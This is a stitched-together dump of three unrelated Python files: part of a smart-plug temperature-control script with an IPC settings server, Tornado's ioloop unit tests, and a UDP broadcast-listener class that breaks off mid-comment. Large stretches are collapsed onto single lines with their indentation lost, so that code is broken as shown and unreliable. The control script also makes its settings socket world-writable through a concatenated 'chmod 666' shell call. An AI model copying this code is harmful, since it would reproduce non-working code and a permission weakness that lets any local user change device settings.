            newSettingsDict = json.loads(objects[0].properties['json'])
        except Exception:
            useNewSettings = False
        # Try to use the new settings.
        if useNewSettings:
            updateSettingsFromDict(newSettingsDict)
        # Respond with the current settings.
        response = [Response(getIpcResonseJsonStr())]
    finally:
        # ROBUSTNESS FIX: release even if building the reply raises, so one bad
        # request cannot leave the mutex locked forever.
        settingsMutex.release()  # Unlock Mutex
    return response


def runIpcServer(socketPath):
    """Blocking IPC server loop; run on a background thread."""
    ipc.Server(socketPath, ipcMessageCallback).serve_forever()


def setupIcpServer(socketPath):
    """Start the IPC server thread on socketPath, removing any stale socket first."""
    if os.path.exists(socketPath):
        os.remove(socketPath)
    t = Thread(target=runIpcServer, args=(socketPath,))
    t.start()
    # Make sure the socket file is accessible by the webserver.
for i in range(100): if os.path.exists(socketPath): os.system('chmod 666 ' + socketPath) # allow anyone to read/write break else: time.sleep(0.1) ################################################################################ # Temperature Helper Functions ################################################################################ def getTemperature(tempCtrlSettings): curTemperature = temperatureSensorLib.temperatureSensor_getFahrenheit() retVal = curTemperature try: global temperatureStoreValuesForAverage global lastTemperatureValue global lastTemperatureAverage lastTemperatureValue = curTemperature if curTemperature != None: if curTemperature > tempCtrlSettings.INVALID_TEMPERATURE_HIGH or curTemperature < tempCtrlSettings.INVALID_TEMPERATURE_LOW: logMsg("Invalid temperature from sensor: " + str(curTemperature)) curTemperature = None else: temperatureStoreValuesForAverage.append(curTemperature) else: logMsg("Failed to read from temperature sensor.") # Remove old temperature values from the list. maxNumValuesToStore = int(math.ceil(tempCtrlSettings.TEMPERATURE_AVERAGE_TIME_AMOUNT / tempCtrlSettings.TIME_BETWEEN_TEMPERATURE_CHECK)) if len(temperatureStoreValuesForAverage) >= maxNumValuesToStore: temperatureStoreValuesForAverage = temperatureStoreValuesForAverage[-maxNumValuesToStore:] # Compute the average temperature from all the values in the list. 
averageSum = 0 for temp in temperatureStoreValuesForAverage: averageSum += temp averageTemperature = averageSum / len(temperatureStoreValuesForAverage) retVal = averageTemperature lastTemperatureAverage = averageTemperature except: logMsg("Failed somewhere in computing average temperature.") return retVal def determineIfSwitchStateNeedsToBeSet(temperature, tempCtrlSettings): retVal = SWITCH_STATE_NO_CHANGE try: deltaTemp = tempCtrlSettings.SWITCH_COMFORT_RANGE / 2.0 if tempCtrlSettings.SWITCH_HEAT_COOL < 0: # Cool onTemp = tempCtrlSettings.SWITCH_TEMPERATURE + deltaTemp offTemp = tempCtrlSettings.SWITCH_TEMPERATURE - deltaTemp if temperature >= onTemp: retVal = SWITCH_STATE_ON elif temperature <= offTemp: retVal = SWITCH_STATE_OFF elif tempCtrlSettings.SWITCH_HEAT_COOL > 0: # Heat onTemp = tempCtrlSettings.SWITCH_TEMPERATURE - deltaTemp offTemp = tempCtrlSettings.SWITCH_TEMPERATURE + deltaTemp if temperature <= onTemp: retVal = SWITCH_STATE_ON elif temperature >= offTemp: retVal = SWITCH_STATE_OFF except: logMsg("Failed to determine if the switch state needs to be set.") return retVal ################################################################################ # Smart Plug Helper Functions ################################################################################ def setSmartPlugState_withCheck(switchState, tempCtrlSettings): global currentSwitchState # Check for situation where we need to return silently. This is used for situations where no smart switch exists, but the temperature sensor is being manually monitored. 
if tempCtrlSettings.SMART_PLUG_IP_ADDR == None or tempCtrlSettings.SMART_PLUG_IP_ADDR == "": currentSwitchState = True if switchState == SWITCH_STATE_ON else False return CHANGE_SWITCH_RESULT_SUCCESS_NO_CHANGE_NEEDED retVal = CHANGE_SWITCH_RESULT_FAILED try: desiredSwitchState = False # False for off, True for on if switchState == SWITCH_STATE_ON: desiredSwitchState = True currentSwitchState = smartPlugLib.smartPlug_getState(tempCtrlSettings.SMART_PLUG_IP_ADDR) if currentSwitchState != None: if currentSwitchState != desiredSwitchState: logMsg("Changing switch state to: " + str(switchState)) time.sleep(1) # Just talked to the switch to determine status. Wait a moment before setting the new state. (Probably not necessary, but shouldn't hurt either.) success = smartPlugLib.smartPlug_onOff(tempCtrlSettings.SMART_PLUG_IP_ADDR, desiredSwitchState) if success: retVal = CHANGE_SWITCH_RESULT_SUCCESS_SWITCH_STATE_CHANGED else: retVal = CHANGE_SWITCH_RESULT_SUCCESS_NO_CHANGE_NEEDED else: logMsg("Failed to determine the current state of the switch.") except: logMsg("Failed somewhere in the process of setting the state of the switch.") return retVal def setSmartPlugState_withoutCheck(switchState, tempCtrlSettings): global currentSwitchState # Check for situation where we need to return silently. This is used for situations where no smart switch exists, but the temperature sensor is being manually monitored. 
if tempCtrlSettings.SMART_PLUG_IP_ADDR == None or tempCtrlSettings.SMART_PLUG_IP_ADDR == "": currentSwitchState = True if switchState == SWITCH_STATE_ON else False return CHANGE_SWITCH_RESULT_SUCCESS_NO_CHANGE_NEEDED retVal = CHANGE_SWITCH_RESULT_FAILED try: desiredSwitchState = False # False for off, True for on if switchState == SWITCH_STATE_ON: desiredSwitchState = True switchStateIsChanging = False if currentSwitchState != None and currentSwitchState == desiredSwitchState: pass # Nothing to do else: logMsg("Changing switch state to: " + str(switchState)) switchStateIsChanging = True success = smartPlugLib.smartPlug_onOff(tempCtrlSettings.SMART_PLUG_IP_ADDR, desiredSwitchState) if success: currentSwitchState = desiredSwitchState if switchStateIsChanging: retVal = CHANGE_SWITCH_RESULT_SUCCESS_SWITCH_STATE_CHANGED else: retVal = CHANGE_SWITCH_RESULT_SUCCESS_NO_CHANGE_NEEDED except: logMsg("Failed somewhere in the process of setting the state of the switch.") return retVal ################################################################################ # Time Helper Functions ################################################################################ def getSleepTimeUntilNextTemperatureCheckTime(tempCtrlSettings): global nextTemperatureCheckTime sleepTime = tempCtrlSettings.TIME_BETWEEN_TEMPERATURE_CHECK try: # Determine the next time to check the temperature. nextTemperatureCheckTime += tempCtrlSettings.TIME_BETWEEN_TEMPERATURE_CHECK currentTime = getCurrentTime() while nextTemperatureCheckTime < currentTime: nextTemperatureCheckTime += tempCtrlSettings.TIME_BETWEEN_TEMPERATURE_CHECK # Sleep until the next time to check the temperature. 
sleepTime = nextTemperatureCheckTime - currentTime except: logMsg("Failed to determine sleep amount, using default.") return sleepTime def isItTimeOfDayToControlSwitch(tempCtrlSettings): retVal = False try: timeFormatStr = "%H%M" # Note: default time format string is "%c" now = time.strftime(timeFormatStr) timestamp = "{}".format(now) nowTimeOfDay = int(timestamp) if tempCtrlSettings.TIME_OF_DAY_TO_START > tempCtrlSettings.TIME_OF_DAY_TO_STOP: # Start in 1 day and ends in the next day if nowTimeOfDay >= tempCtrlSettings.TIME_OF_DAY_TO_START or nowTimeOfDay < tempCtrlSettings.TIME_OF_DAY_TO_STOP: retVal = True else: # Start and end in same day if nowTimeOfDay >= tempCtrlSettings.TIME_OF_DAY_TO_START and nowTimeOfDay < tempCtrlSettings.TIME_OF_DAY_TO_STOP: retVal = True except: logMsg("Failed to determine time of day.") return retVal def getTimeUntilSwitchCanBeSet(ignoreTimeSinceLastSuccess = False): global lastFailedSwitchChangeTime global lastSuccessfulSwitchChangeTime currentTime = getCurrentTime() timeSinceLastSwitchChangeFailure = currentTime - lastFailedSwitchChangeTime timeSinceLastSwitchChangeSuccess = currentTime - lastSuccessfulSwitchChangeTime if ignoreTimeSinceLastSuccess: timeSinceLastSwitchChangeSuccess = tempCtrlSettings.MIN_TIME_BETWEEN_CHANGING_SWITCH_STATE # Set such that different below will be zero. 
timeUntilSwitchCanBeSet = max(tempCtrlSettings.MIN_TIME_BETWEEN_RETRYING_SWITCH_CHANGE - timeSinceLastSwitchChangeFailure, \ tempCtrlSettings.MIN_TIME_BETWEEN_CHANGING_SWITCH_STATE - timeSinceLastSwitchChangeSuccess) return timeUntilSwitchCanBeSet if timeUntilSwitchCanBeSet > 0 else 0 def resetTimeSwitchCanBeSet(switchSetResult): global lastFailedSwitchChangeTime global lastSuccessfulSwitchChangeTime if switchSetResult == CHANGE_SWITCH_RESULT_FAILED: lastFailedSwitchChangeTime = getCurrentTime() lastSuccessfulSwitchChangeTime = WAY_IN_THE_PAST elif switchSetResult == CHANGE_SWITCH_RESULT_SUCCESS_SWITCH_STATE_CHANGED or switchSetResult == CHANGE_SWITCH_RESULT_SUCCESS_NO_CHANGE_NEEDED: lastSuccessfulSwitchChangeTime = getCurrentTime() lastFailedSwitchChangeTime = WAY_IN_THE_PAST ################################################################################ # Program Start ################################################################################ # Initialization logMsg("##### Starting Temperature Control Switch #####") goodSettings = loadSettingsFromJson() printTempCtrlSettings(currentTempCtrlSettings) setupIcpServer(IPC_SOCKET_PATH) if goodSettings == False: logMsg("##### Invalid Starting Settings - Waiting for valid settings.") while goodSettings == False: time.sleep(10) goodSettings = loadSettingsFromJson() if goodSettings: logMsg("##### Valid Start Settings Found #####") temperatureSensorLib.temperatureSensor_init() temperatureSensorLib.temperatureSensor_getFahrenheit() # It seems like the first temperature can be old, clear out the old value. 
nextTemperatureCheckTime = getCurrentTime() setSmartPlugState = setSmartPlugState_withoutCheck # Start Forever Loop while 1: settingsMutex.acquire() tempCtrlSettings = copy.copy(currentTempCtrlSettings) # Copy the settings off for use during this loop through the while 1 settingsMutex.release() temperature = getTemperature(tempCtrlSettings) if temperature != None: extraLog = "" try: if isItTimeOfDayToControlSwitch(tempCtrlSettings) and tempCtrlSettings.SWITCH_HEAT_COOL != 0: # Check if it is ok to modify the switch state (based on the current time). timeUntilSwitchCanBeSet = getTimeUntilSwitchCanBeSet() if timeUntilSwitchCanBeSet <= 0: # Switch can be set. switchChange = determineIfSwitchStateNeedsToBeSet(temperature, tempCtrlSettings) if switchChange == SWITCH_STATE_ON or switchChange == SWITCH_STATE_OFF: result = setSmartPlugState(switchChange, tempCtrlSettings) resetTimeSwitchCanBeSet(result) extraLog = result else: extraLog = switchChange else: extraLog = "Can't set switch for {:3d} seconds".format(int(timeUntilSwitchCanBeSet)) checkForSwitchChangeDuringNonSwitchTime = True else: if checkForSwitchChangeDuringNonSwitchTime or newParametersForMainLoop: newParametersForMainLoop = False extraLog = "Leaving time to control switch - " if tempCtrlSettings.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP != None: if getTimeUntilSwitchCanBeSet(True) <= 0: # Check if we can switch. Since this is a one off time change, ignore the time of the last successful temperature based switch. newSwitchState = SWITCH_STATE_ON if tempCtrlSettings.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP else SWITCH_STATE_OFF result = setSmartPlugState(newSwitchState, tempCtrlSettings) resetTimeSwitchCanBeSet(result) if result != CHANGE_SWITCH_RESULT_FAILED: checkForSwitchChangeDuringNonSwitchTime = False extraLog += ("Succeeded in setting switch state to: " + newSwitchState) else: extraLog += ("Failed to set switch state to: " + newSwitchState) else: extraLog += "Waiting to be able to change switch state." 
else: checkForSwitchChangeDuringNonSwitchTime = False extraLog += "No change of switch specified." else: extraLog = "Not controlling switch at this time." logMsg("Temperature = {: 3.1f} | ".format(temperature) + extraLog, True) # Log temperature and switch state. lastTemperatureLogTime = updateTemperatureLogFile(temperature, currentSwitchState, lastTemperatureLogTime) except: logMsg("Failed somewhere in the while 1 loop.") else: logMsg("Failed to read temperature!") # Use the most up-to-date settings for the while 1 sleep. settingsMutex.acquire() sleepTime = getSleepTimeUntilNextTemperatureCheckTime(currentTempCtrlSettings) settingsMutex.release() time.sleep(sleepTime)
# ======================= ioloop_test.py (next concatenated file) =======================
#!/usr/bin/env python
# Tests for tornado.ioloop (Tornado's own test suite). Timing-sensitive test
# code: left byte-for-byte, comments only added.
from __future__ import absolute_import, division, print_function, with_statement
import contextlib
import datetime
import functools
import socket
import sys
import threading
import time

from tornado import gen
from tornado.ioloop import IOLoop, TimeoutError, PollIOLoop, PeriodicCallback
from tornado.log import app_log
from tornado.platform.select import _Select
from tornado.stack_context import ExceptionStackContext, StackContext, wrap, NullContext
from tornado.testing import AsyncTestCase, bind_unused_port, ExpectLog
from tornado.test.util import unittest, skipIfNonUnix, skipOnTravis, skipBefore35, exec_test

try:
    from concurrent import futures
except ImportError:
    futures = None


class FakeTimeSelect(_Select):
    # Select implementation with a simulated clock: poll() never blocks, it
    # advances the fake time by the requested timeout instead.
    def __init__(self):
        self._time = 1000
        super(FakeTimeSelect, self).__init__()

    def time(self):
        return self._time

    def sleep(self, t):
        self._time += t

    def poll(self, timeout):
        events = super(FakeTimeSelect, self).poll(0)
        if events:
            return events
        self._time += timeout
        return []


class FakeTimeIOLoop(PollIOLoop):
    """IOLoop implementation with a fake and deterministic clock.

    The clock advances as needed to trigger timeouts immediately.
    For use when testing code that involves the passage of time
    and no external dependencies.
    """
    def initialize(self):
        self.fts = FakeTimeSelect()
        super(FakeTimeIOLoop, self).initialize(impl=self.fts,
                                               time_func=self.fts.time)

    def sleep(self, t):
        """Simulate a blocking sleep by advancing the clock."""
        self.fts.sleep(t)


class TestIOLoop(AsyncTestCase):
    # NOTE: this class continues past the end of this chunk.
    @skipOnTravis
    def test_add_callback_wakeup(self):
        # Make sure that add_callback from inside a running IOLoop
        # wakes up the IOLoop immediately instead of waiting for a timeout.
        def callback():
            self.called = True
            self.stop()

        def schedule_callback():
            self.called = False
            self.io_loop.add_callback(callback)
            # Store away the time so we can check if we woke up immediately
            self.start_time = time.time()
        self.io_loop.add_timeout(self.io_loop.time(), schedule_callback)
        self.wait()
        self.assertAlmostEqual(time.time(), self.start_time, places=2)
        self.assertTrue(self.called)

    @skipOnTravis
    def test_add_callback_wakeup_other_thread(self):
        def target():
            # sleep a bit to let the ioloop go into its poll loop
            time.sleep(0.01)
            self.stop_time = time.time()
            self.io_loop.add_callback(self.stop)
        thread = threading.Thread(target=target)
        self.io_loop.add_callback(thread.start)
        self.wait()
        delta = time.time() - self.stop_time
        self.assertLess(delta, 0.1)
        thread.join()

    def test_add_timeout_timedelta(self):
        self.io_loop.add_timeout(datetime.timedelta(microseconds=1), self.stop)
        self.wait()

    def test_multiple_add(self):
        sock, port = bind_unused_port()
        try:
            self.io_loop.add_handler(sock.fileno(), lambda fd, events: None,
                                     IOLoop.READ)
            # Attempting to add the same handler twice fails
            # (with a platform-dependent exception)
            self.assertRaises(Exception, self.io_loop.add_handler,
                              sock.fileno(), lambda fd, events: None,
                              IOLoop.READ)
        finally:
            self.io_loop.remove_handler(sock.fileno())
            sock.close()

    def test_remove_without_add(self):
        # remove_handler should not throw an exception if called on an fd
        # was never added.
        sock, port = bind_unused_port()
        try:
            self.io_loop.remove_handler(sock.fileno())
        finally:
            sock.close()

    def test_add_callback_from_signal(self):
        # cheat a little bit and just run this normally, since we can't
        # easily simulate the races that happen with real signal handlers
        self.io_loop.add_callback_from_signal(self.stop)
        self.wait()

    def test_add_callback_from_signal_other_thread(self):
        # Very crude test, just to make sure that we cover this case.
        # This also happens to be the first test where we run an IOLoop in
        # a non-main thread.
        other_ioloop = IOLoop()
        thread = threading.Thread(target=other_ioloop.start)
        thread.start()
        other_ioloop.add_callback_from_signal(other_ioloop.stop)
        thread.join()
        other_ioloop.close()

    def test_add_callback_while_closing(self):
        # Issue #635: add_callback() should raise a clean exception
        # if called while another thread is closing the IOLoop.
        if IOLoop.configured_class().__name__.endswith('AsyncIOLoop'):
            raise unittest.SkipTest("AsyncIOMainLoop shutdown not thread safe")
        closing = threading.Event()

        def target():
            other_ioloop.add_callback(other_ioloop.stop)
            other_ioloop.start()
            closing.set()
            other_ioloop.close(all_fds=True)
        other_ioloop = IOLoop()
        thread = threading.Thread(target=target)
        thread.start()
        closing.wait()
        for i in range(1000):
            try:
                other_ioloop.add_callback(lambda: None)
            except RuntimeError as e:
                self.assertEqual("IOLoop is closing", str(e))
                break

    def test_handle_callback_exception(self):
        # IOLoop.handle_callback_exception can be overridden to catch
        # exceptions in callbacks.
        def handle_callback_exception(callback):
            self.assertIs(sys.exc_info()[0], ZeroDivisionError)
            self.stop()
        self.io_loop.handle_callback_exception = handle_callback_exception
        with NullContext():
            # remove the test StackContext that would see this uncaught
            # exception as a test failure.
            self.io_loop.add_callback(lambda: 1 / 0)
        self.wait()

    @skipIfNonUnix  # just because socketpair is so convenient
    def test_read_while_writeable(self):
        # Ensure that write events don't come in while we're waiting for
        # a read and haven't asked for writeability. (the reverse is
        # difficult to test for)
        client, server = socket.socketpair()
        try:
            def handler(fd, events):
                self.assertEqual(events, IOLoop.READ)
                self.stop()
            self.io_loop.add_handler(client.fileno(), handler,
                                     IOLoop.READ)
            self.io_loop.add_timeout(self.io_loop.time() + 0.01,
                                     functools.partial(server.send, b'asdf'))
            self.wait()
            self.io_loop.remove_handler(client.fileno())
        finally:
            client.close()
            server.close()

    def test_remove_timeout_after_fire(self):
        # It is not an error to call remove_timeout after it has run.
        handle = self.io_loop.add_timeout(self.io_loop.time(), self.stop)
        self.wait()
        self.io_loop.remove_timeout(handle)

    def test_remove_timeout_cleanup(self):
        # Add and remove enough callbacks to trigger cleanup.
        # Not a very thorough test, but it ensures that the cleanup code
        # gets executed and doesn't blow up.  This test is only really useful
        # on PollIOLoop subclasses, but it should run silently on any
        # implementation.
        for i in range(2000):
            timeout = self.io_loop.add_timeout(self.io_loop.time() + 3600,
                                               lambda: None)
            self.io_loop.remove_timeout(timeout)
        # HACK: wait two IOLoop iterations for the GC to happen.
        self.io_loop.add_callback(lambda: self.io_loop.add_callback(self.stop))
        self.wait()

    def test_remove_timeout_from_timeout(self):
        calls = [False, False]

        # Schedule several callbacks and wait for them all to come due at once.
        # t2 should be cancelled by t1, even though it is already scheduled to
        # be run before the ioloop even looks at it.
        now = self.io_loop.time()

        def t1():
            calls[0] = True
            self.io_loop.remove_timeout(t2_handle)
        self.io_loop.add_timeout(now + 0.01, t1)

        def t2():
            calls[1] = True
        t2_handle = self.io_loop.add_timeout(now + 0.02, t2)
        self.io_loop.add_timeout(now + 0.03, self.stop)
        time.sleep(0.03)
        self.wait()
        self.assertEqual(calls, [True, False])

    def test_timeout_with_arguments(self):
        # This tests that all the timeout methods pass through *args correctly.
        results = []
        self.io_loop.add_timeout(self.io_loop.time(), results.append, 1)
        self.io_loop.add_timeout(datetime.timedelta(seconds=0),
                                 results.append, 2)
        self.io_loop.call_at(self.io_loop.time(), results.append, 3)
        self.io_loop.call_later(0, results.append, 4)
        self.io_loop.call_later(0, self.stop)
        self.wait()
        self.assertEqual(results, [1, 2, 3, 4])

    def test_add_timeout_return(self):
        # All the timeout methods return non-None handles that can be
        # passed to remove_timeout.
        handle = self.io_loop.add_timeout(self.io_loop.time(), lambda: None)
        self.assertFalse(handle is None)
        self.io_loop.remove_timeout(handle)

    def test_call_at_return(self):
        handle = self.io_loop.call_at(self.io_loop.time(), lambda: None)
        self.assertFalse(handle is None)
        self.io_loop.remove_timeout(handle)

    def test_call_later_return(self):
        handle = self.io_loop.call_later(0, lambda: None)
        self.assertFalse(handle is None)
        self.io_loop.remove_timeout(handle)

    def test_close_file_object(self):
        """When a file object is used instead of a numeric file descriptor,
        the object should be closed (by IOLoop.close(all_fds=True),
        not just the fd.
        """
        # Use a socket since they are supported by IOLoop on all platforms.
        # Unfortunately, sockets don't support the .closed attribute for
        # inspecting their close status, so we must use a wrapper.
        class SocketWrapper(object):
            def __init__(self, sockobj):
                self.sockobj = sockobj
                self.closed = False

            def fileno(self):
                return self.sockobj.fileno()

            def close(self):
                self.closed = True
                self.sockobj.close()
        sockobj, port = bind_unused_port()
        socket_wrapper = SocketWrapper(sockobj)
        io_loop = IOLoop()
        io_loop.add_handler(socket_wrapper, lambda fd, events: None,
                            IOLoop.READ)
        io_loop.close(all_fds=True)
        self.assertTrue(socket_wrapper.closed)

    def test_handler_callback_file_object(self):
        """The handler callback receives the same fd object it passed in."""
        server_sock, port = bind_unused_port()
        fds = []

        def handle_connection(fd, events):
            fds.append(fd)
            conn, addr = server_sock.accept()
            conn.close()
            self.stop()
        # First registration with the socket object itself...
        self.io_loop.add_handler(server_sock, handle_connection, IOLoop.READ)
        with contextlib.closing(socket.socket()) as client_sock:
            client_sock.connect(('127.0.0.1', port))
            self.wait()
        self.io_loop.remove_handler(server_sock)
        # ...then with the raw file descriptor; the callback must see each form.
        self.io_loop.add_handler(server_sock.fileno(), handle_connection,
                                 IOLoop.READ)
        with contextlib.closing(socket.socket()) as client_sock:
            client_sock.connect(('127.0.0.1', port))
            self.wait()
        self.assertIs(fds[0], server_sock)
        self.assertEqual(fds[1], server_sock.fileno())
        self.io_loop.remove_handler(server_sock.fileno())
        server_sock.close()

    def test_mixed_fd_fileobj(self):
        server_sock, port = bind_unused_port()

        def f(fd, events):
            pass
        self.io_loop.add_handler(server_sock, f, IOLoop.READ)
        with self.assertRaises(Exception):
            # The exact error is unspecified - some implementations use
            # IOError, others use ValueError.
            self.io_loop.add_handler(server_sock.fileno(), f, IOLoop.READ)
        self.io_loop.remove_handler(server_sock.fileno())
        server_sock.close()

    def test_reentrant(self):
        """Calling start() twice should raise an error, not deadlock."""
        returned_from_start = [False]
        got_exception = [False]

        def callback():
            try:
                self.io_loop.start()
                returned_from_start[0] = True
            except Exception:
                got_exception[0] = True
            self.stop()
        self.io_loop.add_callback(callback)
        self.wait()
        self.assertTrue(got_exception[0])
        self.assertFalse(returned_from_start[0])

    def test_exception_logging(self):
        """Uncaught exceptions get logged by the IOLoop."""
        # Use a NullContext to keep the exception from being caught by
        # AsyncTestCase.
        with NullContext():
            self.io_loop.add_callback(lambda: 1 / 0)
            self.io_loop.add_callback(self.stop)
            with ExpectLog(app_log, "Exception in callback"):
                self.wait()

    def test_exception_logging_future(self):
        """The IOLoop examines exceptions from Futures and logs them."""
        with NullContext():
            @gen.coroutine
            def callback():
                self.io_loop.add_callback(self.stop)
                1 / 0
            self.io_loop.add_callback(callback)
            with ExpectLog(app_log, "Exception in callback"):
                self.wait()

    @skipBefore35
    def test_exception_logging_native_coro(self):
        """The IOLoop examines exceptions from awaitables and logs them."""
        namespace = exec_test(globals(), locals(), """
        async def callback():
            self.io_loop.add_callback(self.stop)
            1 / 0
        """)
        with NullContext():
            self.io_loop.add_callback(namespace["callback"])
            with ExpectLog(app_log, "Exception in callback"):
                self.wait()

    def test_spawn_callback(self):
        # An added callback runs in the test's stack_context, so will be
        # re-arised in wait().
        self.io_loop.add_callback(lambda: 1 / 0)
        with self.assertRaises(ZeroDivisionError):
            self.wait()
        # A spawned callback is run directly on the IOLoop, so it will be
        # logged without stopping the test.
self.io_loop.spawn_callback(lambda: 1 / 0) self.io_loop.add_callback(self.stop) with ExpectLog(app_log, "Exception in callback"): self.wait() @skipIfNonUnix def test_remove_handler_from_handler(self): # Create two sockets with simultaneous read events. client, server = socket.socketpair() try: client.send(b'abc') server.send(b'abc') # After reading from one fd, remove the other from the IOLoop. chunks = [] def handle_read(fd, events): chunks.append(fd.recv(1024)) if fd is client: self.io_loop.remove_handler(server) else: self.io_loop.remove_handler(client) self.io_loop.add_handler(client, handle_read, self.io_loop.READ) self.io_loop.add_handler(server, handle_read, self.io_loop.READ) self.io_loop.call_later(0.1, self.stop) self.wait() # Only one fd was read; the other was cleanly removed. self.assertEqual(chunks, [b'abc']) finally: client.close() server.close() # Deliberately not a subclass of AsyncTestCase so the IOLoop isn't # automatically set as current. class TestIOLoopCurrent(unittest.TestCase): def setUp(self): self.io_loop = None IOLoop.clear_current() def tearDown(self): if self.io_loop is not None: self.io_loop.close() def test_default_current(self): self.io_loop = IOLoop() # The first IOLoop with default arguments is made current. self.assertIs(self.io_loop, IOLoop.current()) # A second IOLoop can be created but is not made current. io_loop2 = IOLoop() self.assertIs(self.io_loop, IOLoop.current()) io_loop2.close() def test_non_current(self): self.io_loop = IOLoop(make_current=False) # The new IOLoop is not initially made current. self.assertIsNone(IOLoop.current(instance=False)) # Starting the IOLoop makes it current, and stopping the loop # makes it non-current. This process is repeatable. for i in range(3): def f(): self.current_io_loop = IOLoop.current() self.io_loop.stop() self.io_loop.add_callback(f) self.io_loop.start() self.assertIs(self.current_io_loop, self.io_loop) # Now that the loop is stopped, it is no longer current. 
self.assertIsNone(IOLoop.current(instance=False)) def test_force_current(self): self.io_loop = IOLoop(make_current=True) self.assertIs(self.io_loop, IOLoop.current()) with self.assertRaises(RuntimeError): # A second make_current=True construction cannot succeed. IOLoop(make_current=True) # current() was not affected by the failed construction. self.assertIs(self.io_loop, IOLoop.current()) class TestIOLoopAddCallback(AsyncTestCase): def setUp(self): super(TestIOLoopAddCallback, self).setUp() self.active_contexts = [] def add_callback(self, callback, *args, **kwargs): self.io_loop.add_callback(callback, *args, **kwargs) @contextlib.contextmanager def context(self, name): self.active_contexts.append(name) yield self.assertEqual(self.active_contexts.pop(), name) def test_pre_wrap(self): # A pre-wrapped callback is run in the context in which it was # wrapped, not when it was added to the IOLoop. def f1(): self.assertIn('c1', self.active_contexts) self.assertNotIn('c2', self.active_contexts) self.stop() with StackContext(functools.partial(self.context, 'c1')): wrapped = wrap(f1) with StackContext(functools.partial(self.context, 'c2')): self.add_callback(wrapped) self.wait() def test_pre_wrap_with_args(self): # Same as test_pre_wrap, but the function takes arguments. 
# Implementation note: The function must not be wrapped in a # functools.partial until after it has been passed through # stack_context.wrap def f1(foo, bar): self.assertIn('c1', self.active_contexts) self.assertNotIn('c2', self.active_contexts) self.stop((foo, bar)) with StackContext(functools.partial(self.context, 'c1')): wrapped = wrap(f1) with StackContext(functools.partial(self.context, 'c2')): self.add_callback(wrapped, 1, bar=2) result = self.wait() self.assertEqual(result, (1, 2)) class TestIOLoopAddCallbackFromSignal(TestIOLoopAddCallback): # Repeat the add_callback tests using add_callback_from_signal def add_callback(self, callback, *args, **kwargs): self.io_loop.add_callback_from_signal(callback, *args, **kwargs) @unittest.skipIf(futures is None, "futures module not present") class TestIOLoopFutures(AsyncTestCase): def test_add_future_threads(self): with futures.ThreadPoolExecutor(1) as pool: self.io_loop.add_future(pool.submit(lambda: None), lambda future: self.stop(future)) future = self.wait() self.assertTrue(future.done()) self.assertTrue(future.result() is None) def test_add_future_stack_context(self): ready = threading.Event() def task(): # we must wait for the ioloop callback to be scheduled before # the task completes to ensure that add_future adds the callback # asynchronously (which is the scenario in which capturing # the stack_context matters) ready.wait(1) assert ready.isSet(), "timed out" raise Exception("worker") def callback(future): self.future = future raise Exception("callback") def handle_exception(typ, value, traceback): self.exception = value self.stop() return True # stack_context propagates to the ioloop callback, but the worker # task just has its exceptions caught and saved in the Future. 
with futures.ThreadPoolExecutor(1) as pool: with ExceptionStackContext(handle_exception): self.io_loop.add_future(pool.submit(task), callback) ready.set() self.wait() self.assertEqual(self.exception.args[0], "callback") self.assertEqual(self.future.exception().args[0], "worker") class TestIOLoopRunSync(unittest.TestCase): def setUp(self): self.io_loop = IOLoop() def tearDown(self): self.io_loop.close() def test_sync_result(self): with self.assertRaises(gen.BadYieldError): self.io_loop.run_sync(lambda: 42) def test_sync_exception(self): with self.assertRaises(ZeroDivisionError): self.io_loop.run_sync(lambda: 1 / 0) def test_async_result(self): @gen.coroutine def f(): yield gen.Task(self.io_loop.add_callback) raise gen.Return(42) self.assertEqual(self.io_loop.run_sync(f), 42) def test_async_exception(self): @gen.coroutine def f(): yield gen.Task(self.io_loop.add_callback) 1 / 0 with self.assertRaises(ZeroDivisionError): self.io_loop.run_sync(f) def test_current(self): def f(): self.assertIs(IOLoop.current(), self.io_loop) self.io_loop.run_sync(f) def test_timeout(self): @gen.coroutine def f(): yield gen.Task(self.io_loop.add_timeout, self.io_loop.time() + 1) self.assertRaises(TimeoutError, self.io_loop.run_sync, f, timeout=0.01) @skipBefore35 def test_native_coroutine(self): namespace = exec_test(globals(), locals(), """ async def f(): await gen.Task(self.io_loop.add_callback) """) self.io_loop.run_sync(namespace['f']) class TestPeriodicCallback(unittest.TestCase): def setUp(self): self.io_loop = FakeTimeIOLoop() self.io_loop.make_current() def tearDown(self): self.io_loop.close() def test_basic(self): calls = [] def cb(): calls.append(self.io_loop.time()) pc = PeriodicCallback(cb, 10000) pc.start() self.io_loop.call_later(50, self.io_loop.stop) self.io_loop.start() self.assertEqual(calls, [1010, 1020, 1030, 1040, 1050]) def test_overrun(self): sleep_durations = [9, 9, 10, 11, 20, 20, 35, 35, 0, 0] expected = [ 1010, 1020, 1030, # first 3 calls on schedule 1050, 
1070, # next 2 delayed one cycle 1100, 1130, # next 2 delayed 2 cycles 1170, 1210, # next 2 delayed 3 cycles 1220, 1230, # then back on schedule. ] calls = [] def cb(): calls.append(self.io_loop.time()) if not sleep_durations: self.io_loop.stop() return self.io_loop.sleep(sleep_durations.pop(0)) pc = PeriodicCallback(cb, 10000) pc.start() self.io_loop.start() self.assertEqual(calls, expected) if __name__ == "__main__": unittest.main()
BroadcastListener.py
import socket
import threading
import time


class BroadcastListener:
    """Listens for UDP datagrams on a fixed port and prints each one.

    StartListenerAsync() spawns a background thread that blocks in
    recvfrom(); StopListener() raises a halt flag and sends a sentinel
    datagram so the blocked thread wakes up and can exit.
    """

    # Payload StopListener() sends to wake the listener thread.
    _STOP_SENTINEL = b'end'

    def __init__(self, port):
        # UDP port to listen on.
        self._port = port
        # True while no listener is running.  Initialised here so that
        # calling StopListener() before StartListenerAsync() is harmless
        # (previously it raised AttributeError on the missing attribute).
        self._haltFlag = True
        self._listenerThread = None

    def StartListenerAsync(self):
        """Start the background listener thread; returns immediately."""
        self._haltFlag = False
        self._listenerThread = threading.Thread(target=self._startListener)
        # Daemon thread so a forgotten StopListener() cannot hang interpreter exit.
        self._listenerThread.daemon = True
        self._listenerThread.start()

    def StopListener(self):
        """Signal the listener thread to stop and wake it with a datagram."""
        self._haltFlag = True
        stopSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            stopSocket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
            # Wake our own listener via loopback.  The original broadcast to
            # 255.255.255.255 is dropped by many routers/host configs, which
            # could leave the thread blocked in recvfrom() forever; the
            # listener is bound to '' so loopback reaches it.  The payload is
